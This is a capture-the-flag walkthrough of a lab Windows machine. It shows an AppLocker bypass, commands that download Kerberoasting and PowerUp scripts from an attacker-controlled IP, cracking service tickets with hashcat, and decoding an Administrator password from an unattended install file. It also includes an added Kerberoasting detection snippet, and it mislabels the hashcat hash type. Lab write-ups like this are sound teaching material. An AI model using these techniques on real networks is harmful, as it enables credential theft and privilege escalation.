
TryHackMe – Corp Walkthrough

Introduction

This was an easy Windows machine that involved exploiting a Kerberoastable service account to gain initial access and using a base64-encoded password stored in an unattended installation file to escalate privileges to Administrator.

Bypassing Applocker

Since AppLocker is configured with the default rules, which allow execution from anywhere under C:\Windows, they can be bypassed by placing an executable in C:\Windows\System32\spool\drivers\color: this directory is covered by that default rule and is writable by standard users.

To test this, the “whoami.exe” binary is moved to the current working directory and a Python Simple HTTP Server is set up to host it:

Using the Invoke-WebRequest cmdlet to download the file and save it in the directory mentioned above:

Invoke-WebRequest -Uri http://10.9.228.20/whoami.exe -OutFile C:/Windows/System32/spool/drivers/color/whoami.exe

The request was received:

Finding the first flag by inspecting the PowerShell history:

Get-Content C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Kerberoasting

Kerberoasting is an attack that requests service tickets for service accounts from Active Directory and extracts them as hashes for offline cracking.

Looking for users with the service principal name property set with the following command:

setspn -T medin -Q */*

This identified the “fela” user.

Downloading the Invoke-Kerberoast.ps1 script and hosting it using a Python Simple HTTP Server:

Downloading it locally:

Invoke-WebRequest -Uri http://10.9.228.20/Invoke-Kerberoast.ps1 -OutFile Invoke-Kerberoast.ps1

The request was received:

Using Invoke-Kerberoast to dump the hash for the “fela” user:

Saving the hash to a file locally:

Running hashcat with the following flags to crack the ticket offline:

  • -a to specify the attack mode, in this case, 0 for dictionary
  • -m to specify the hash type, in this case, krbtgt
  • the file containing the hashes
  • the wordlist to use for the attack

Authenticating as the “fela” user through RDP using FreeRDP:

Viewing the second flag:
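From the defender's side, the Kerberoasting step above leaves a trace: every service ticket request is logged as Security event ID 4769, and Invoke-Kerberoast asks for RC4-HMAC (encryption type 0x17) tickets for user-type service accounts. The following Python snippet is an added example, not part of the original walkthrough, that runs a simple detection rule over constructed one-line 4769 exports; the account names, SPNs and addresses in it are made up.

```python
"""Flag probable Kerberoasting in constructed Windows 4769 (TGS request) events."""
import re
from collections import defaultdict

# Constructed one-line exports of Security event ID 4769 (not real logs).
SAMPLE_4769 = """\
Account Name: dark@CORP.LOCAL Service Name: fela Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.2.15
Account Name: dark@CORP.LOCAL Service Name: svc_sql Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.2.15
Account Name: dark@CORP.LOCAL Service Name: svc_web Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.2.15
Account Name: alice@CORP.LOCAL Service Name: CORP-DC$ Ticket Encryption Type: 0x12 Client Address: ::ffff:10.0.2.20
Account Name: alice@CORP.LOCAL Service Name: krbtgt Ticket Encryption Type: 0x12 Client Address: ::ffff:10.0.2.20
Account Name: bob@CORP.LOCAL Service Name: fela Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.2.21
"""

FIELDS = re.compile(
    r"Account Name: (?P<account>\S+) Service Name: (?P<service>\S+) "
    r"Ticket Encryption Type: (?P<etype>0x[0-9a-fA-F]+) Client Address: (?P<ip>\S+)"
)
RC4_HMAC = "0x17"  # etype 23: what Invoke-Kerberoast requests, cracked with hashcat -m 13100


def parse_events(text):
    """Turn the one-line export format above into dicts; unparseable lines are skipped."""
    return [m.groupdict() for m in (FIELDS.search(l) for l in text.splitlines()) if m]


def is_roastable_request(ev):
    """RC4 ticket for a user service account (machine accounts and krbtgt are excluded)."""
    svc = ev["service"]
    return ev["etype"].lower() == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"


def kerberoast_suspects(events, threshold=2):
    """Map requester -> sorted SPN accounts for requesters that pulled RC4 tickets
    for at least `threshold` distinct user service accounts. A single RC4 ticket
    can be legitimate in older domains, so the threshold keeps noise down."""
    per_account = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].add(ev["service"])
    return {a: sorted(s) for a, s in per_account.items() if len(s) >= threshold}


if __name__ == "__main__":
    for acct, svcs in kerberoast_suspects(parse_events(SAMPLE_4769)).items():
        print(f"possible Kerberoasting by {acct}: RC4 tickets for {', '.join(svcs)}")
```

Enforcing AES-only tickets on service accounts and using long random passwords for them removes the weak hash this attack depends on, and the 0x17 filter then becomes a high-signal alert.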

Privilege Escalation

Downloading the PowerUp privilege escalation script and hosting it using a Python Simple HTTP Server:

Downloading the script:

Invoke-WebRequest -Uri http://10.9.228.20/PowerUp.ps1 -OutFile Invoke-PowerUp.ps1

The request was received:

Running the Invoke-AllChecks function from PowerUp to start enumerating the system:

An unattended installation file was found:

These files often contain encoded or plain-text credentials. Viewing the contents reveals a base64-encoded password:

Decoding the password:

# Placeholder: paste the base64 value taken from the unattended installation file
$encoded = "<base64-encoded password>"
# Decode the base64 string and interpret the bytes as ASCII text
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($encoded)) | Write-Output

This revealed the clear-text password for the Administrator user. Authenticating as the Administrator user through RDP using FreeRDP:

Upon authenticating, the user is greeted with the following message because the local password has expired. Hitting “OK”:

Changing the password to a new one:

Reading the last flag:

Conclusion

This was a great machine for learning the basics of Active Directory exploitation and Windows privilege escalation. It is part of TryHackMe’s Offensive Pentesting learning path and can definitely help greatly during the OSCP journey.